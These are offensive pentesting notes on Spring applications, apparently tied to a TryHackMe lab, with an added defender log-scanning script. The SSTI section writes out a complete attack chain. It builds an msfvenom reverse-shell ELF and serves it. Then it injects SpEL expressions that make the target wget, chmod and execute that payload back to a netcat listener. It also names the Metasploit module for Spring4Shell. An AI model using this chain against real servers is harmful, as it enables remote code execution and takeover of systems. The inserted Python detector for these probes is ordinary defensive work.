Spring Pentesting

Spring is an application framework and inversion of control container for the Java platform.

- [spring4shell](https://tryhackme.com/room/spring4shell)

Framework Detection

If the site returns Spring Boot's default "Whitelabel Error Page" (for example on a non-existent path), it is most likely built on Spring Boot.


Enumeration

Directory Discovery

ffuf -u https://example.com/FUZZ -w seclists/Discovery/Web-Content/spring-boot.txt


SSTI

Discovery

If user input from a form (such as a search form) or a URL parameter is reflected in the page, the site may be vulnerable to server-side template injection.

Try the following expressions in the input; if the page renders 4 instead of the literal text, the input is being evaluated:

2*2
#{2*2}
*{2*2}

Once an expression evaluates, confirm it further with a method call on a string:

{"dfd".replace("d", "x")}
#{"dfd".replace("d", "x")}
*{"dfd".replace("d", "x")}

Expected output if the expression is evaluated:

"xfx"

Reverse Shell

First, generate the reverse shell payload that the target will download from our machine.

msfvenom -p linux/x64/shell_reverse_tcp LHOST=<local-ip> LPORT=<local-port> -f elf > r.elf

Start a local web server so the target can download the payload named "r.elf":

python3 -m http.server 8000

In another terminal, start a listener to catch the reverse shell:

nc -lvnp <local-port>

Then submit the following expressions to the vulnerable input on the target, one at a time:

*{"".getClass().forName("java.lang.Runtime").getRuntime().exec("wget http://<local-ip>:8000/r.elf")}

*{"".getClass().forName("java.lang.Runtime").getRuntime().exec("chmod 777 ./r.elf")}

*{"".getClass().forName("java.lang.Runtime").getRuntime().exec("./r.elf")}

The listener should then receive the shell.
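Added here as a defender-side example (not part of the original notes): a Python script that decodes query strings from constructed access-log lines and flags the expression probes listed above (`#{2*2}`, `*{"dfd".replace(...)}`) as well as expressions that reach into `getClass().forName` / `java.lang.Runtime`. The log lines, paths and IP addresses are constructed samples.

```python
import re
from urllib.parse import unquote_plus

# Spring/Thymeleaf expression delimiters: ${...}, *{...}, #{...}, @{...}, ~{...}
EXPR_RE = re.compile(r'[$*#@~]\{[^}]*\}')
ARITH_RE = re.compile(r'\d\s*[*+/-]\s*\d')          # e.g. 2*2 inside the braces
EXEC_HINTS = ("getClass(", "forName(", "Runtime", ".exec(")
# Apache/nginx combined-format access log (constructed sample lines below)
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

def classify_request(raw_query):
    """Decode a query string and label every template expression found in it."""
    findings = []
    for m in EXPR_RE.finditer(unquote_plus(raw_query)):
        expr, inner = m.group(0), m.group(0)[2:-1]
        if ARITH_RE.search(inner):
            findings.append(("arith-probe", expr))      # 2*2 style test
        elif any(h in inner for h in EXEC_HINTS):
            findings.append(("code-exec", expr))        # reflection into Runtime
        elif ".replace(" in inner or '"' in inner:
            findings.append(("string-probe", expr))     # "dfd".replace(...) style test
        else:
            findings.append(("expression", expr))       # any other evaluated expression
    return findings

def scan_log(lines):
    """Return (client_ip, label, expression) for every suspicious request."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        query = m.group("path").partition("?")[2]
        alerts.extend((m.group("ip"), kind, expr) for kind, expr in classify_request(query))
    return alerts

# Constructed sample log: one benign search and the three probe stages from the notes
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] "GET /search?q=hello HTTP/1.1" 200 512',
    '192.0.2.20 - - [01/Jan/2024:10:00:02 +0000] "GET /search?q=%23%7B2*2%7D HTTP/1.1" 200 498',
    '192.0.2.20 - - [01/Jan/2024:10:00:03 +0000] "GET /search?q=*%7B%22dfd%22.replace(%22d%22,%22x%22)%7D HTTP/1.1" 200 501',
    '192.0.2.20 - - [01/Jan/2024:10:00:04 +0000] "GET /search?q=*%7B%22%22.getClass().forName(%22java.lang.Runtime%22)%7D HTTP/1.1" 500 1204',
]

if __name__ == "__main__":
    for ip, kind, expr in scan_log(SAMPLE_LOG):
        print(f"{ip}\t{kind}\t{expr}")
```

The same classification can be applied to POST bodies and to WAF or reverse-proxy logs, where a single source moving from an arithmetic probe to a `Runtime` expression is the pattern worth alerting on.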


Spring4Shell (CVE-2022-22965)

Spring4Shell is a remote code execution vulnerability in the Spring Framework. It affects Spring Core, the heart of the framework.
It is a bypass of the patch for CVE-2010-1622.

Exploitation

Metasploit includes a module for this vulnerability:

msfconsole
msf> use exploit/multi/http/spring_framework_rce_spring4shell

Alternatively, various PoCs are available on GitHub.